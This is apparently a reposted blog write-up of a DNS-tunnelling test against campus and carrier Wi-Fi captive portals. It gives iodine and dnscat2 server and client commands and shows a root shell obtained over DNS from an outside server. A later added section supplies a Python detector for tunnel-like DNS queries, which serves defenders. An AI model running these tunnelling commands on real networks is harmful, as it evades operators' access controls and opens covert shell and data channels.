DNS Tunnel Test

Source: Internet  Published under: mysql数据库基础面试题  Editor: 程序博客网  Time: 2024/04/30 02:10

I first connected to CMCC-EDU, and then noticed that the routing table had changed.

```
➜  ~ route -n                                                        [20:18:44]
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.170.2   0.0.0.0         UG    0      0        0 eth0
0.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan0
10.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0
192.168.170.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0
218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0
```

Then I found that the DNS servers had changed as well; judging by the modification time of /etc/resolv.conf, it was rewritten right after connecting to the hotspot.

```
➜  ~ cat /etc/resolv.conf                                            [20:19:05]
# Generated by NetworkManager
nameserver 218.201.17.2
nameserver 218.201.4.3
➜  ~ ll /etc/resolv.conf                                             [20:19:12]
lrwxrwxrwx 1 root root 35 Apr 11 20:17 /etc/resolv.conf -> /var/run/NetworkManager/resolv.conf
```

Before that, my DNS server had been the default one, a virtual IP on the host machine (192.168.170.2).

```
➜  ~ cat /etc/resolv.conf                                                                [20:45:49]
domain localdomain
search localdomain
nameserver 192.168.170.2
```

The host machine's IP is 192.168.170.1.
I first cut my Kali VM off from the host so that it reached the outside only through the wireless card (by connecting to the CMCC-EDU hotspot):

```
ifconfig eth0 down
```

After connecting to the hotspot, I got an internal IP.

```
➜  ~ ifconfig                                                        [20:23:20]
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 6602  bytes 4772279 (4.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6602  bytes 4772279 (4.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.254.47.32  netmask 255.255.255.0  broadcast 10.254.47.255
        inet6 fe80::3abe:7cf0:785a:1bba  prefixlen 64  scopeid 0x20<link>
        ether 80:1f:02:ed:14:d8  txqueuelen 1000  (Ethernet)
        RX packets 36  bytes 5250 (5.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3128  bytes 251697 (245.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

The gateway is:

```
➜  ~ route -n                                                        [20:20:31]
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan0
10.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0
218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0
```

Then, although no HTTP response came back and baidu.com could not be pinged, DNS resolution still succeeded.

```
➜  ~ curl 10.254.47.1                                                [20:21:17]
curl: (52) Empty reply from server
➜  ~ dig baidu.com @218.201.17.2                                     [20:21:23]

; <<>> DiG 9.10.3-P4-Debian <<>> baidu.com @218.201.17.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19904
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;baidu.com.         IN  A

;; ANSWER SECTION:
baidu.com.      10252   IN  A   111.13.101.208
baidu.com.      10252   IN  A   180.149.132.47
baidu.com.      10252   IN  A   123.125.114.144
baidu.com.      10252   IN  A   220.181.57.217

;; Query time: 5 msec
;; SERVER: 218.201.17.2#53(218.201.17.2)
;; WHEN: Tue Apr 11 20:21:54 CST 2017
;; MSG SIZE  rcvd: 102

➜  ~ ping 180.149.132.47                                             [20:21:54]
PING 180.149.132.47 (180.149.132.47) 56(84) bytes of data.
^C
--- 180.149.132.47 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 5105ms
➜  ~ dig mydomain.me @218.201.17.2                                    [20:22:08]

; <<>> DiG 9.10.3-P4-Debian <<>> mydomain.me @218.201.17.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45846
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;mydomain.me.           IN  A

;; ANSWER SECTION:
mydomain.me.        10723   IN  A   123.my.i.p

;; Query time: 1041 msec
;; SERVER: 218.201.17.2#53(218.201.17.2)
;; WHEN: Tue Apr 11 20:22:25 CST 2017
;; MSG SIZE  rcvd: 55
```

So I wondered: could a DNS tunnel work here?
The server side was already set up, using iodine:

```
sudo iodined -f 192.168.77.1 ns.mydomain.me -P mypassword
```

Next, my Kali client.

```
➜  ~ iodine -f -P mypassword 123.my.i.p ns.mydomain.me                             [1:57:54]
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for ns.mydomain.me to 123.my.i.p
Autodetecting DNS query type (use -T to override).....................
iodine: No suitable DNS query type found. Are you connected to a network?
iodine: If you expect very long roundtrip delays, use -T explicitly.
iodine: (Also, connecting to an "ancient" version of iodined won't work.)
```

However, it did not succeed. Sure enough, CMCC-EDU's security is done somewhat better than the school's, even though a reverse DNS shell can be used on CMCC-EDU

Trying the CQUPT wireless network

Sure enough, as soon as I connected to CQUPT the DNS servers were changed:

```
➜  ~ cat /etc/resolv.conf                                             [1:08:47]
# Generated by NetworkManager
search cqupt.edu.cn
nameserver 61.128.128.68
nameserver 202.202.32.33
nameserver 202.202.32.34
```

But when I used the CQUPT wireless network, it worked. As expected, the school's own wireless network is not that strictly secured (I remember that for a while you could simply get online for free, and then it was blocked again).

Using dnscat

Server side

```
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install
$ sudo ruby ./dnscat2.rb ns.mydomain.me
```

Client side

On Linux/Unix you need to download the source and compile it first:

```
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make
```

After it compiles successfully,

Note that during transfer this shows up frequently:

```
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.
[[ WARNING ]] :: exec driver shut down; killing process 35257
[[ ERROR ]] :: DNS: RCODE_REFUSED
[[ FATAL ]] :: There are no active sessions left! Goodbye!
[[ WARNING ]] :: Terminating
```

Finally, if the server has not sent any instruction within the last 20 attempts, the client closes (as shown above).

A shell was obtained successfully.


Kali client

```
Encrypted session established! For added security, please verify the server also displays this string:

Strode Teeth Plight Push Story Yerba

Session established!
```

Server side

```
>> Strode Teeth Plight Push Story Yerba

This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (kali) 2> cat /etc/issue
sh (kali) 2> Kali GNU/Linux Rolling \n \l

sh (kali) 2> id
sh (kali) 2> uid=0(root) gid=0(root) groups=0(root)
sh (kali) 2>
```

Here 218.201.17.2 is the CMCC DNS server.
Everything captured with Wireshark on Kali is DNS traffic.
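Seen from the resolver side, that capture is a stream of long, random-looking subdomains under one zone, mostly TXT/NULL/CNAME queries, which is the signature a defender can score for; the script below is an added example, not part of the original post, that aggregates such queries per registered domain and flags tunnel-like patterns. The sample queries are constructed to resemble this session, and the thresholds and the two-label registered_domain() heuristic are assumptions to tune per network.

```python
import math
from collections import Counter, defaultdict

# Constructed sample (not a real capture), modelled on the session above: ordinary
# lookups plus the long, random-looking subdomains a tunnel client emits under its
# zone, carrying the record types iodine/dnscat2 prefer (TXT, NULL, CNAME, MX).
SAMPLE_QUERIES = [
    ("baidu.com", "A"), ("www.baidu.com", "A"), ("api.ipify.org", "A"),
    ("mail.cqupt.edu.cn", "A"), ("www.baidu.com", "A"),
    ("0xk9q3zp7f2mw8a1c5b6n4r2t9v3x7.ns.mydomain.me", "TXT"),
    ("1xd4h8j2l6p0s3u7w9y1b5e8g2k6m0.ns.mydomain.me", "TXT"),
    ("2xq7t1v5z9a3c7e1g5i9k3m7o1q5s9.ns.mydomain.me", "NULL"),
    ("3xu2w6y0b4d8f2h6j0l4n8p2r6t0v4.ns.mydomain.me", "TXT"),
    ("4xa5c9e3g7i1k5m9o3q7s1u5w9y3b7.ns.mydomain.me", "CNAME"),
]
TUNNEL_QTYPES = {"TXT", "NULL", "CNAME", "MX"}

def shannon_entropy(s):
    """Bits of entropy per character; random base32/base64 labels score high."""
    if not s:
        return 0.0
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def registered_domain(qname):
    """Assumed simplification: last two labels (a real tool would use the PSL)."""
    return ".".join(qname.split(".")[-2:])

def score_domains(queries, min_entropy=3.5, min_sub_len=20, min_odd=0.5, min_uniq=0.9):
    """Aggregate per registered domain; thresholds are assumed starting points."""
    agg = defaultdict(lambda: {"n": 0, "ent": 0.0, "len": 0, "odd": 0, "subs": set()})
    for qname, qtype in queries:
        qname = qname.rstrip(".").lower()
        dom = registered_domain(qname)
        sub = qname[: len(qname) - len(dom)].rstrip(".")  # labels left of the zone
        st = agg[dom]
        st["n"] += 1
        st["ent"] += shannon_entropy(sub)
        st["len"] += len(sub)
        st["odd"] += qtype.upper() in TUNNEL_QTYPES
        st["subs"].add(sub)
    report = {}
    for dom, st in agg.items():
        n = st["n"]
        r = {"queries": n, "avg_entropy": round(st["ent"] / n, 2),
             "avg_subdomain_len": round(st["len"] / n, 1), "odd_type_ratio": round(st["odd"] / n, 2),
             "unique_ratio": round(len(st["subs"]) / n, 2)}
        r["suspicious"] = (r["avg_entropy"] >= min_entropy and r["avg_subdomain_len"] >= min_sub_len
                           and r["odd_type_ratio"] >= min_odd and r["unique_ratio"] >= min_uniq)
        report[dom] = r
    return report
```

Feed it the query names and types exported from a resolver log or a Wireshark DNS filter; a single zone that scores high on all four signals is worth a closer look, while a high count alone is not, since CDNs also generate many unique subdomains.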
Reference:
Using DNS tunnels to pass data and commands to bypass firewalls

Aside

After opening Wireshark, I noticed this machine trying to establish a TCP connection to an IP (52.39.237.157). I looked it up and eventually suspected it was the Firefox browser I had open, retrying because it had earlier failed to reach api.ipify.org; checking with ipip, this IP should indeed be api.ipify.org's. Perhaps this is Firefox's policy: if a connection does not go through, it retries after a while.

```
➜  reGeorg master ✓ ipip 52.39.237.157                                                                                            [20:24:27]
                        美国俄勒冈州波特兰  amazon.com
➜  reGeorg master ✓ ipip api.ipify.org                                                                                            [20:24:31]
                        美国弗吉尼亚州阿什本  amazon.com
```